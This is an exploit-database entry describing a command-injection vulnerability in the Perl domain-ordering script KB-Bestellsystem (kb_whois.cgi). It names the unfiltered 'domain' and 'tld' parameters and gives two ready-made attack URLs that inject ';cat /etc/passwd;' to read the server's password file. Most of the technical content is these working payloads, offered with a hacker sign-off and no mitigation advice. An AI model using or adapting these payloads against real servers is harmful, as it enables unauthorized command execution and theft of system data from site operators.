[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

KB-Bestellsystem (kb_whois.cgi) Command Execution Vulnerability

Author
Zero X
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2305
Category
web applications
Date add
22-11-2007
Platform
cgi
===============================================================
KB-Bestellsystem (kb_whois.cgi) Command Execution Vulnerability
===============================================================



"KB-Bestellsystem" is a domain order system written in Perl.
The "domain" and "tld" parameters in "kb_whois.cgi" are not filtering shell metacharacters.

The following examples will show you the /etc/passwd file:

http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=;cat%20/etc/passwd;&tld=.com&tarrif=
http://targethost.com/kb-bestellsystem/kb_whois.cgi?action=check_owner&domain=google&tld=.com;cat /etc/passwd;&tarrif=

<< Greetz Zero X >>



#  0day.today [2024-11-15]  #